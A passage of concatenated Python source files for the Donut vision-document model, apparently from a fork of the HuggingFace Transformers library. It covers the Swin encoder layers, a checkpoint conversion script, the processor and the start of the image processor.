class DonutSwinLayer(nn.Module):
def __init__(self, config, dim, input_resolution, num_heads, shift_size=0):
super().__init__()
self.chunk_size_feed_forward = config.chunk_size_feed_forward
self.shift_size = shift_size
self.window_size = config.window_size
self.input_resolution = input_resolution
self.layernorm_before = nn.LayerNorm(dim, eps=config.layer_norm_eps)
self.attention = DonutSwinAttention(config, dim, num_heads, window_size=self.window_size)
self.drop_path = DonutSwinDropPath(config.drop_path_rate) if config.drop_path_rate > 0.0 else nn.Identity()
self.layernorm_after = nn.LayerNorm(dim, eps=config.layer_norm_eps)
self.intermediate = DonutSwinIntermediate(config, dim)
self.output = DonutSwinOutput(config, dim)
def set_shift_and_window_size(self, input_resolution):
if min(input_resolution) <= self.window_size:
# if window size is larger than input resolution, we don't partition windows
self.shift_size = 0
self.window_size = min(input_resolution)
def get_attn_mask(self, height, width, dtype):
if self.shift_size > 0:
# calculate attention mask for SW-MSA
img_mask = torch.zeros((1, height, width, 1), dtype=dtype)
height_slices = (
slice(0, -self.window_size),
slice(-self.window_size, -self.shift_size),
slice(-self.shift_size, None),
)
width_slices = (
slice(0, -self.window_size),
slice(-self.window_size, -self.shift_size),
slice(-self.shift_size, None),
)
count = 0
for height_slice in height_slices:
for width_slice in width_slices:
img_mask[:, height_slice, width_slice, :] = count
count += 1
mask_windows = window_partition(img_mask, self.window_size)
mask_windows = mask_windows.view(-1, self.window_size * self.window_size)
attn_mask = mask_windows.unsqueeze(1) - mask_windows.unsqueeze(2)
attn_mask = attn_mask.masked_fill(attn_mask != 0, float(-100.0)).masked_fill(attn_mask == 0, float(0.0))
else:
attn_mask = None
return attn_mask
def maybe_pad(self, hidden_states, height, width):
pad_right = (self.window_size - width % self.window_size) % self.window_size
pad_bottom = (self.window_size - height % self.window_size) % self.window_size
pad_values = (0, 0, 0, pad_right, 0, pad_bottom)
hidden_states = nn.functional.pad(hidden_states, pad_values)
return hidden_states, pad_values
def forward(
self,
hidden_states: torch.Tensor,
input_dimensions: Tuple[int, int],
head_mask: Optional[torch.FloatTensor] = None,
output_attentions: Optional[bool] = False,
always_partition: Optional[bool] = False,
) -> Tuple[torch.Tensor, torch.Tensor]:
if not always_partition:
self.set_shift_and_window_size(input_dimensions)
else:
pass
height, width = input_dimensions
batch_size, _, channels = hidden_states.size()
shortcut = hidden_states
hidden_states = self.layernorm_before(hidden_states)
hidden_states = hidden_states.view(batch_size, height, width, channels)
# pad hidden_states to multiples of window size
hidden_states, pad_values = self.maybe_pad(hidden_states, height, width)
_, height_pad, width_pad, _ = hidden_states.shape
# cyclic shift
if self.shift_size > 0:
shifted_hidden_states = torch.roll(hidden_states, shifts=(-self.shift_size, -self.shift_size), dims=(1, 2))
else:
shifted_hidden_states = hidden_states
# partition windows
hidden_states_windows = window_partition(shifted_hidden_states, self.window_size)
hidden_states_windows = hidden_states_windows.view(-1, self.window_size * self.window_size, channels)
attn_mask = self.get_attn_mask(height_pad, width_pad, dtype=hidden_states.dtype)
if attn_mask is not None:
attn_mask = attn_mask.to(hidden_states_windows.device)
attention_outputs = self.attention(
hidden_states_windows, attn_mask, head_mask, output_attentions=output_attentions
)
attention_output = attention_outputs[0]
attention_windows = attention_output.view(-1, self.window_size, self.window_size, channels)
shifted_windows = window_reverse(attention_windows, self.window_size, height_pad, width_pad)
# reverse cyclic shift
if self.shift_size > 0:
attention_windows = torch.roll(shifted_windows, shifts=(self.shift_size, self.shift_size), dims=(1, 2))
else:
attention_windows = shifted_windows
was_padded = pad_values[3] > 0 or pad_values[5] > 0
if was_padded:
attention_windows = attention_windows[:, :height, :width, :].contiguous()
attention_windows = attention_windows.view(batch_size, height * width, channels)
hidden_states = shortcut + self.drop_path(attention_windows)
layer_output = self.layernorm_after(hidden_states)
layer_output = self.intermediate(layer_output)
layer_output = hidden_states + self.output(layer_output)
layer_outputs = (layer_output, attention_outputs[1]) if output_attentions else (layer_output,)
return layer_outputs
# Copied from transformers.models.swin.modeling_swin.SwinStage with Swin->DonutSwin
class DonutSwinStage(nn.Module):
def __init__(self, config, dim, input_resolution, depth, num_heads, drop_path, downsample):
super().__init__()
self.config = config
self.dim = dim
self.blocks = nn.ModuleList(
[
DonutSwinLayer(
config=config,
dim=dim,
input_resolution=input_resolution,
num_heads=num_heads,
shift_size=0 if (i % 2 == 0) else config.window_size // 2,
)
for i in range(depth)
]
)
# patch merging layer
if downsample is not None:
self.downsample = downsample(input_resolution, dim=dim, norm_layer=nn.LayerNorm)
else:
self.downsample = None
self.pointing = False
def forward(
self,
hidden_states: torch.Tensor,
input_dimensions: Tuple[int, int],
head_mask: Optional[torch.FloatTensor] = None,
output_attentions: Optional[bool] = False,
always_partition: Optional[bool] = False,
) -> Tuple[torch.Tensor]:
height, width = input_dimensions
for i, layer_module in enumerate(self.blocks):
layer_head_mask = head_mask[i] if head_mask is not None else None
layer_outputs = layer_module(
hidden_states, input_dimensions, layer_head_mask, output_attentions, always_partition
)
hidden_states = layer_outputs[0]
hidden_states_before_downsampling = hidden_states
if self.downsample is not None:
height_downsampled, width_downsampled = (height + 1) // 2, (width + 1) // 2
output_dimensions = (height, width, height_downsampled, width_downsampled)
hidden_states = self.downsample(hidden_states_before_downsampling, input_dimensions)
else:
output_dimensions = (height, width, height, width)
stage_outputs = (hidden_states, hidden_states_before_downsampling, output_dimensions)
if output_attentions:
stage_outputs += layer_outputs[1:]
return stage_outputs
# Copied from transformers.models.swin.modeling_swin.SwinEncoder with Swin->DonutSwin
class DonutSwinEncoder(nn.Module):
def __init__(self, config, grid_size):
super().__init__()
self.num_layers = len(config.depths)
self.config = config
dpr = [x.item() for x in torch.linspace(0, config.drop_path_rate, sum(config.depths))]
self.layers = nn.ModuleList(
[
DonutSwinStage(
config=config,
dim=int(config.embed_dim * 2**i_layer),
input_resolution=(grid_size[0] // (2**i_layer), grid_size[1] // (2**i_layer)),
depth=config.depths[i_layer],
num_heads=config.num_heads[i_layer],
drop_path=dpr[sum(config.depths[:i_layer]) : sum(config.depths[: i_layer + 1])],
downsample=DonutSwinPatchMerging if (i_layer < self.num_layers - 1) else None,
)
for i_layer in range(self.num_layers)
]
)
self.gradient_checkpointing = False
def forward(
self,
hidden_states: torch.Tensor,
input_dimensions: Tuple[int, int],
head_mask: Optional[torch.FloatTensor] = None,
output_attentions: Optional[bool] = False,
output_hidden_states: Optional[bool] = False,
output_hidden_states_before_downsampling: Optional[bool] = False,
always_partition: Optional[bool] = False,
return_dict: Optional[bool] = True,
) -> Union[Tuple, DonutSwinEncoderOutput]:
all_hidden_states = () if output_hidden_states else None
all_reshaped_hidden_states = () if output_hidden_states else None
all_self_attentions = () if output_attentions else None
if output_hidden_states:
batch_size, _, hidden_size = hidden_states.shape
# rearrange b (h w) c -> b c h w
reshaped_hidden_state = hidden_states.view(batch_size, *input_dimensions, hidden_size)
reshaped_hidden_state = reshaped_hidden_state.permute(0, 3, 1, 2)
all_hidden_states += (hidden_states,)
all_reshaped_hidden_states += (reshaped_hidden_state,)
for i, layer_module in enumerate(self.layers):
layer_head_mask = head_mask[i] if head_mask is not None else None
if self.gradient_checkpointing and self.training:
def create_custom_forward(module):
def custom_forward(*inputs):
return module(*inputs, output_attentions)
return custom_forward
layer_outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(layer_module), hidden_states, input_dimensions, layer_head_mask
)
else:
layer_outputs = layer_module(
hidden_states, input_dimensions, layer_head_mask, output_attentions, always_partition
)
hidden_states = layer_outputs[0]
hidden_states_before_downsampling = layer_outputs[1]
output_dimensions = layer_outputs[2]
input_dimensions = (output_dimensions[-2], output_dimensions[-1])
if output_hidden_states and output_hidden_states_before_downsampling:
batch_size, _, hidden_size = hidden_states_before_downsampling.shape
# rearrange b (h w) c -> b c h w
# here we use the original (not downsampled) height and width
reshaped_hidden_state = hidden_states_before_downsampling.view(
batch_size, *(output_dimensions[0], output_dimensions[1]), hidden_size
)
reshaped_hidden_state = reshaped_hidden_state.permute(0, 3, 1, 2)
all_hidden_states += (hidden_states_before_downsampling,)
all_reshaped_hidden_states += (reshaped_hidden_state,)
elif output_hidden_states and not output_hidden_states_before_downsampling:
batch_size, _, hidden_size = hidden_states.shape
# rearrange b (h w) c -> b c h w
reshaped_hidden_state = hidden_states.view(batch_size, *input_dimensions, hidden_size)
reshaped_hidden_state = reshaped_hidden_state.permute(0, 3, 1, 2)
all_hidden_states += (hidden_states,)
all_reshaped_hidden_states += (reshaped_hidden_state,)
if output_attentions:
all_self_attentions += layer_outputs[3:]
if not return_dict:
return tuple(v for v in [hidden_states, all_hidden_states, all_self_attentions] if v is not None)
return DonutSwinEncoderOutput(
last_hidden_state=hidden_states,
hidden_states=all_hidden_states,
attentions=all_self_attentions,
reshaped_hidden_states=all_reshaped_hidden_states,
)
# Copied from transformers.models.swin.modeling_swin.SwinPreTrainedModel with Swin->DonutSwin
class DonutSwinPreTrainedModel(PreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = DonutSwinConfig
base_model_prefix = "swin"
main_input_name = "pixel_values"
supports_gradient_checkpointing = True
def _init_weights(self, module):
"""Initialize the weights"""
if isinstance(module, (nn.Linear, nn.Conv2d)):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.LayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
def _set_gradient_checkpointing(self, module, value=False):
if isinstance(module, DonutSwinEncoder):
module.gradient_checkpointing = value
SWIN_START_DOCSTRING = r"""
This model is a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) sub-class. Use
it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage and
behavior.
Parameters:
config ([`DonutSwinConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
SWIN_INPUTS_DOCSTRING = r"""
Args:
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Pixel values. Pixel values can be obtained using [`AutoImageProcessor`]. See
[`DonutImageProcessor.__call__`] for details.
head_mask (`torch.FloatTensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
@add_start_docstrings(
"The bare Donut Swin Model transformer outputting raw hidden-states without any specific head on top.",
SWIN_START_DOCSTRING,
)
class DonutSwinModel(DonutSwinPreTrainedModel):
def __init__(self, config, add_pooling_layer=True, use_mask_token=False):
super().__init__(config)
self.config = config
self.num_layers = len(config.depths)
self.num_features = int(config.embed_dim * 2 ** (self.num_layers - 1))
self.embeddings = DonutSwinEmbeddings(config, use_mask_token=use_mask_token)
self.encoder = DonutSwinEncoder(config, self.embeddings.patch_grid)
self.pooler = nn.AdaptiveAvgPool1d(1) if add_pooling_layer else None
# Initialize weights and apply final processing
self.post_init()
def get_input_embeddings(self):
return self.embeddings.patch_embeddings
def _prune_heads(self, heads_to_prune):
"""
Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
class PreTrainedModel
"""
for layer, heads in heads_to_prune.items():
self.encoder.layer[layer].attention.prune_heads(heads)
@add_start_docstrings_to_model_forward(SWIN_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=DonutSwinModelOutput,
config_class=_CONFIG_FOR_DOC,
modality="vision",
expected_output=_EXPECTED_OUTPUT_SHAPE,
)
def forward(
self,
pixel_values: Optional[torch.FloatTensor] = None,
bool_masked_pos: Optional[torch.BoolTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, DonutSwinModelOutput]:
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if pixel_values is None:
raise ValueError("You have to specify pixel_values")
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
# and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
head_mask = self.get_head_mask(head_mask, len(self.config.depths))
embedding_output, input_dimensions = self.embeddings(pixel_values, bool_masked_pos=bool_masked_pos)
encoder_outputs = self.encoder(
embedding_output,
input_dimensions,
head_mask=head_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = encoder_outputs[0]
pooled_output = None
if self.pooler is not None:
pooled_output = self.pooler(sequence_output.transpose(1, 2))
pooled_output = torch.flatten(pooled_output, 1)
if not return_dict:
output = (sequence_output, pooled_output) + encoder_outputs[1:]
return output
return DonutSwinModelOutput(
last_hidden_state=sequence_output,
pooler_output=pooled_output,
hidden_states=encoder_outputs.hidden_states,
attentions=encoder_outputs.attentions,
reshaped_hidden_states=encoder_outputs.reshaped_hidden_states,
)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 9,321 | src/transformers/models/donut/convert_donut_to_pytorch.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Convert Donut checkpoints using the original `donut-python` library. URL: https://github.com/clovaai/donut"""
import argparse
import torch
from datasets import load_dataset
from donut import DonutModel
from transformers import (
DonutFeatureExtractor,
DonutProcessor,
DonutSwinConfig,
DonutSwinModel,
MBartConfig,
MBartForCausalLM,
VisionEncoderDecoderModel,
XLMRobertaTokenizerFast,
)
def get_configs(model):
original_config = model.config
encoder_config = DonutSwinConfig(
image_size=original_config.input_size,
patch_size=4,
depths=original_config.encoder_layer,
num_heads=[4, 8, 16, 32],
window_size=original_config.window_size,
embed_dim=128,
)
decoder_config = MBartConfig(
is_decoder=True,
is_encoder_decoder=False,
add_cross_attention=True,
decoder_layers=original_config.decoder_layer,
max_position_embeddings=original_config.max_position_embeddings,
vocab_size=len(
model.decoder.tokenizer
), # several special tokens are added to the vocab of XLMRobertaTokenizer, see repo on the hub (added_tokens.json)
scale_embedding=True,
add_final_layer_norm=True,
)
return encoder_config, decoder_config
def rename_key(name):
if "encoder.model" in name:
name = name.replace("encoder.model", "encoder")
if "decoder.model" in name:
name = name.replace("decoder.model", "decoder")
if "patch_embed.proj" in name:
name = name.replace("patch_embed.proj", "embeddings.patch_embeddings.projection")
if "patch_embed.norm" in name:
name = name.replace("patch_embed.norm", "embeddings.norm")
if name.startswith("encoder"):
if "layers" in name:
name = "encoder." + name
if "attn.proj" in name:
name = name.replace("attn.proj", "attention.output.dense")
if "attn" in name and "mask" not in name:
name = name.replace("attn", "attention.self")
if "norm1" in name:
name = name.replace("norm1", "layernorm_before")
if "norm2" in name:
name = name.replace("norm2", "layernorm_after")
if "mlp.fc1" in name:
name = name.replace("mlp.fc1", "intermediate.dense")
if "mlp.fc2" in name:
name = name.replace("mlp.fc2", "output.dense")
if name == "encoder.norm.weight":
name = "encoder.layernorm.weight"
if name == "encoder.norm.bias":
name = "encoder.layernorm.bias"
return name
def convert_state_dict(orig_state_dict, model):
for key in orig_state_dict.copy().keys():
val = orig_state_dict.pop(key)
if "qkv" in key:
key_split = key.split(".")
layer_num = int(key_split[3])
block_num = int(key_split[5])
dim = model.encoder.encoder.layers[layer_num].blocks[block_num].attention.self.all_head_size
if "weight" in key:
orig_state_dict[
f"encoder.encoder.layers.{layer_num}.blocks.{block_num}.attention.self.query.weight"
] = val[:dim, :]
orig_state_dict[
f"encoder.encoder.layers.{layer_num}.blocks.{block_num}.attention.self.key.weight"
] = val[dim : dim * 2, :]
orig_state_dict[
f"encoder.encoder.layers.{layer_num}.blocks.{block_num}.attention.self.value.weight"
] = val[-dim:, :]
else:
orig_state_dict[
f"encoder.encoder.layers.{layer_num}.blocks.{block_num}.attention.self.query.bias"
] = val[:dim]
orig_state_dict[
f"encoder.encoder.layers.{layer_num}.blocks.{block_num}.attention.self.key.bias"
] = val[dim : dim * 2]
orig_state_dict[
f"encoder.encoder.layers.{layer_num}.blocks.{block_num}.attention.self.value.bias"
] = val[-dim:]
elif "attn_mask" in key or key in ["encoder.model.norm.weight", "encoder.model.norm.bias"]:
# HuggingFace implementation doesn't use attn_mask buffer
# and model doesn't use final LayerNorms for the encoder
pass
else:
orig_state_dict[rename_key(key)] = val
return orig_state_dict
def convert_donut_checkpoint(model_name, pytorch_dump_folder_path=None, push_to_hub=False):
# load original model
original_model = DonutModel.from_pretrained(model_name).eval()
# load HuggingFace model
encoder_config, decoder_config = get_configs(original_model)
encoder = DonutSwinModel(encoder_config)
decoder = MBartForCausalLM(decoder_config)
model = VisionEncoderDecoderModel(encoder=encoder, decoder=decoder)
model.eval()
state_dict = original_model.state_dict()
new_state_dict = convert_state_dict(state_dict, model)
model.load_state_dict(new_state_dict)
# verify results on scanned document
dataset = load_dataset("hf-internal-testing/example-documents")
image = dataset["test"][0]["image"].convert("RGB")
tokenizer = XLMRobertaTokenizerFast.from_pretrained(model_name, from_slow=True)
feature_extractor = DonutFeatureExtractor(
do_align_long_axis=original_model.config.align_long_axis, size=original_model.config.input_size[::-1]
)
processor = DonutProcessor(feature_extractor, tokenizer)
pixel_values = processor(image, return_tensors="pt").pixel_values
if model_name == "naver-clova-ix/donut-base-finetuned-docvqa":
task_prompt = "<s_docvqa><s_question>{user_input}</s_question><s_answer>"
question = "When is the coffee break?"
task_prompt = task_prompt.replace("{user_input}", question)
elif model_name == "naver-clova-ix/donut-base-finetuned-rvlcdip":
task_prompt = "<s_rvlcdip>"
elif model_name in [
"naver-clova-ix/donut-base-finetuned-cord-v1",
"naver-clova-ix/donut-base-finetuned-cord-v1-2560",
]:
task_prompt = "<s_cord>"
elif model_name == "naver-clova-ix/donut-base-finetuned-cord-v2":
task_prompt = "s_cord-v2>"
elif model_name == "naver-clova-ix/donut-base-finetuned-zhtrainticket":
task_prompt = "<s_zhtrainticket>"
elif model_name in ["naver-clova-ix/donut-proto", "naver-clova-ix/donut-base"]:
# use a random prompt
task_prompt = "hello world"
else:
raise ValueError("Model name not supported")
prompt_tensors = original_model.decoder.tokenizer(task_prompt, add_special_tokens=False, return_tensors="pt")[
"input_ids"
]
original_patch_embed = original_model.encoder.model.patch_embed(pixel_values)
patch_embeddings, _ = model.encoder.embeddings(pixel_values)
assert torch.allclose(original_patch_embed, patch_embeddings, atol=1e-3)
# verify encoder hidden states
original_last_hidden_state = original_model.encoder(pixel_values)
last_hidden_state = model.encoder(pixel_values).last_hidden_state
assert torch.allclose(original_last_hidden_state, last_hidden_state, atol=1e-2)
# verify decoder hidden states
original_logits = original_model(pixel_values, prompt_tensors, None).logits
logits = model(pixel_values, decoder_input_ids=prompt_tensors).logits
assert torch.allclose(original_logits, logits, atol=1e-3)
print("Looks ok!")
if pytorch_dump_folder_path is not None:
print(f"Saving model and processor to {pytorch_dump_folder_path}")
model.save_pretrained(pytorch_dump_folder_path)
processor.save_pretrained(pytorch_dump_folder_path)
if push_to_hub:
model.push_to_hub("nielsr/" + model_name.split("/")[-1], commit_message="Update model")
processor.push_to_hub("nielsr/" + model_name.split("/")[-1], commit_message="Update model")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# Required parameters
parser.add_argument(
"--model_name",
default="naver-clova-ix/donut-base-finetuned-docvqa",
required=False,
type=str,
help="Name of the original model you'd like to convert.",
)
parser.add_argument(
"--pytorch_dump_folder_path",
default=None,
required=False,
type=str,
help="Path to the output PyTorch model directory.",
)
parser.add_argument(
"--push_to_hub",
action="store_true",
help="Whether or not to push the converted model and processor to the 🤗 hub.",
)
args = parser.parse_args()
convert_donut_checkpoint(args.model_name, args.pytorch_dump_folder_path, args.push_to_hub)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 1,179 | src/transformers/models/donut/feature_extraction_donut.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Feature extractor class for Donut."""
import warnings
from ...utils import logging
from .image_processing_donut import DonutImageProcessor
logger = logging.get_logger(__name__)
class DonutFeatureExtractor(DonutImageProcessor):
def __init__(self, *args, **kwargs) -> None:
warnings.warn(
"The class DonutFeatureExtractor is deprecated and will be removed in version 5 of Transformers. Please"
" use DonutImageProcessor instead.",
FutureWarning,
)
super().__init__(*args, **kwargs)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 8,062 | src/transformers/models/donut/processing_donut.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Processor class for Donut.
"""
import re
import warnings
from contextlib import contextmanager
from ...processing_utils import ProcessorMixin
class DonutProcessor(ProcessorMixin):
r"""
Constructs a Donut processor which wraps a Donut image processor and an XLMRoBERTa tokenizer into a single
processor.
[`DonutProcessor`] offers all the functionalities of [`DonutImageProcessor`] and
[`XLMRobertaTokenizer`/`XLMRobertaTokenizerFast`]. See the [`~DonutProcessor.__call__`] and
[`~DonutProcessor.decode`] for more information.
Args:
image_processor ([`DonutImageProcessor`]):
An instance of [`DonutImageProcessor`]. The image processor is a required input.
tokenizer ([`XLMRobertaTokenizer`/`XLMRobertaTokenizerFast`]):
An instance of [`XLMRobertaTokenizer`/`XLMRobertaTokenizerFast`]. The tokenizer is a required input.
"""
attributes = ["image_processor", "tokenizer"]
image_processor_class = "AutoImageProcessor"
tokenizer_class = "AutoTokenizer"
def __init__(self, image_processor=None, tokenizer=None, **kwargs):
if "feature_extractor" in kwargs:
warnings.warn(
"The `feature_extractor` argument is deprecated and will be removed in v5, use `image_processor`"
" instead.",
FutureWarning,
)
feature_extractor = kwargs.pop("feature_extractor")
image_processor = image_processor if image_processor is not None else feature_extractor
if image_processor is None:
raise ValueError("You need to specify an `image_processor`.")
if tokenizer is None:
raise ValueError("You need to specify a `tokenizer`.")
super().__init__(image_processor, tokenizer)
self.current_processor = self.image_processor
self._in_target_context_manager = False
def __call__(self, *args, **kwargs):
"""
When used in normal mode, this method forwards all its arguments to AutoImageProcessor's
[`~AutoImageProcessor.__call__`] and returns its output. If used in the context
[`~DonutProcessor.as_target_processor`] this method forwards all its arguments to DonutTokenizer's
[`~DonutTokenizer.__call__`]. Please refer to the doctsring of the above two methods for more information.
"""
# For backward compatibility
if self._in_target_context_manager:
return self.current_processor(*args, **kwargs)
images = kwargs.pop("images", None)
text = kwargs.pop("text", None)
if len(args) > 0:
images = args[0]
args = args[1:]
if images is None and text is None:
raise ValueError("You need to specify either an `images` or `text` input to process.")
if images is not None:
inputs = self.image_processor(images, *args, **kwargs)
if text is not None:
encodings = self.tokenizer(text, **kwargs)
if text is None:
return inputs
elif images is None:
return encodings
else:
inputs["labels"] = encodings["input_ids"]
return inputs
def batch_decode(self, *args, **kwargs):
"""
This method forwards all its arguments to DonutTokenizer's [`~PreTrainedTokenizer.batch_decode`]. Please refer
to the docstring of this method for more information.
"""
return self.tokenizer.batch_decode(*args, **kwargs)
def decode(self, *args, **kwargs):
"""
This method forwards all its arguments to DonutTokenizer's [`~PreTrainedTokenizer.decode`]. Please refer to the
docstring of this method for more information.
"""
return self.tokenizer.decode(*args, **kwargs)
@contextmanager
def as_target_processor(self):
"""
Temporarily sets the tokenizer for processing the input. Useful for encoding the labels when fine-tuning TrOCR.
"""
warnings.warn(
"`as_target_processor` is deprecated and will be removed in v5 of Transformers. You can process your "
"labels by using the argument `text` of the regular `__call__` method (either in the same call as "
"your images inputs, or in a separate call."
)
self._in_target_context_manager = True
self.current_processor = self.tokenizer
yield
self.current_processor = self.image_processor
self._in_target_context_manager = False
def token2json(self, tokens, is_inner_value=False, added_vocab=None):
"""
Convert a (generated) token sequence into an ordered JSON format.
"""
if added_vocab is None:
added_vocab = self.tokenizer.get_added_vocab()
output = {}
while tokens:
start_token = re.search(r"<s_(.*?)>", tokens, re.IGNORECASE)
if start_token is None:
break
key = start_token.group(1)
end_token = re.search(rf"</s_{key}>", tokens, re.IGNORECASE)
start_token = start_token.group()
if end_token is None:
tokens = tokens.replace(start_token, "")
else:
end_token = end_token.group()
start_token_escaped = re.escape(start_token)
end_token_escaped = re.escape(end_token)
content = re.search(f"{start_token_escaped}(.*?){end_token_escaped}", tokens, re.IGNORECASE)
if content is not None:
content = content.group(1).strip()
if r"<s_" in content and r"</s_" in content: # non-leaf node
value = self.token2json(content, is_inner_value=True, added_vocab=added_vocab)
if value:
if len(value) == 1:
value = value[0]
output[key] = value
else: # leaf nodes
output[key] = []
for leaf in content.split(r"<sep/>"):
leaf = leaf.strip()
if leaf in added_vocab and leaf[0] == "<" and leaf[-2:] == "/>":
leaf = leaf[1:-2] # for categorical special tokens
output[key].append(leaf)
if len(output[key]) == 1:
output[key] = output[key][0]
tokens = tokens[tokens.find(end_token) + len(end_token) :].strip()
if tokens[:6] == r"<sep/>": # non-leaf nodes
return [output] + self.token2json(tokens[6:], is_inner_value=True, added_vocab=added_vocab)
if len(output):
return [output] if is_inner_value else output
else:
return [] if is_inner_value else {"text_sequence": tokens}
@property
def feature_extractor_class(self):
warnings.warn(
"`feature_extractor_class` is deprecated and will be removed in v5. Use `image_processor_class` instead.",
FutureWarning,
)
return self.image_processor_class
@property
def feature_extractor(self):
warnings.warn(
"`feature_extractor` is deprecated and will be removed in v5. Use `image_processor` instead.",
FutureWarning,
)
return self.image_processor
|
27182812/ChatGLM-LLaMA-chinese-insturct | 20,162 | src/transformers/models/donut/image_processing_donut.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Image processor class for Donut."""
from typing import Dict, List, Optional, Union
import numpy as np
from ...image_processing_utils import BaseImageProcessor, BatchFeature, get_size_dict
from ...image_transforms import (
get_resize_output_image_size,
normalize,
pad,
rescale,
resize,
to_channel_dimension_format,
)
from ...image_utils import (
IMAGENET_STANDARD_MEAN,
IMAGENET_STANDARD_STD,
ChannelDimension,
ImageInput,
PILImageResampling,
get_image_size,
make_list_of_images,
to_numpy_array,
valid_images,
)
from ...utils import TensorType, logging
from ...utils.import_utils import is_vision_available
logger = logging.get_logger(__name__)
if is_vision_available():
import PIL
class DonutImageProcessor(BaseImageProcessor):
r"""
Constructs a Donut image processor.
Args:
do_resize (`bool`, *optional*, defaults to `True`):
Whether to resize the image's (height, width) dimensions to the specified `size`. Can be overridden by
`do_resize` in the `preprocess` method.
size (`Dict[str, int]` *optional*, defaults to `{"shortest_edge": 224}`):
Size of the image after resizing. The shortest edge of the image is resized to size["shortest_edge"], with
the longest edge resized to keep the input aspect ratio. Can be overridden by `size` in the `preprocess`
method.
resample (`PILImageResampling`, *optional*, defaults to `PILImageResampling.BILINEAR`):
Resampling filter to use if resizing the image. Can be overridden by `resample` in the `preprocess` method.
do_center_crop (`bool`, *optional*, defaults to `True`):
Whether to center crop the image to the specified `crop_size`. Can be overridden by `do_center_crop` in the
`preprocess` method.
crop_size (`Dict[str, int]` *optional*, defaults to 224):
Size of the output image after applying `center_crop`. Can be overridden by `crop_size` in the `preprocess`
method.
do_rescale (`bool`, *optional*, defaults to `True`):
Whether to rescale the image by the specified scale `rescale_factor`. Can be overridden by `do_rescale` in
the `preprocess` method.
rescale_factor (`int` or `float`, *optional*, defaults to `1/255`):
Scale factor to use if rescaling the image. Can be overridden by `rescale_factor` in the `preprocess`
method.
do_normalize:
Whether to normalize the image. Can be overridden by `do_normalize` in the `preprocess` method.
image_mean (`float` or `List[float]`, *optional*, defaults to `IMAGENET_STANDARD_MEAN`):
Mean to use if normalizing the image. This is a float or list of floats the length of the number of
channels in the image. Can be overridden by the `image_mean` parameter in the `preprocess` method.
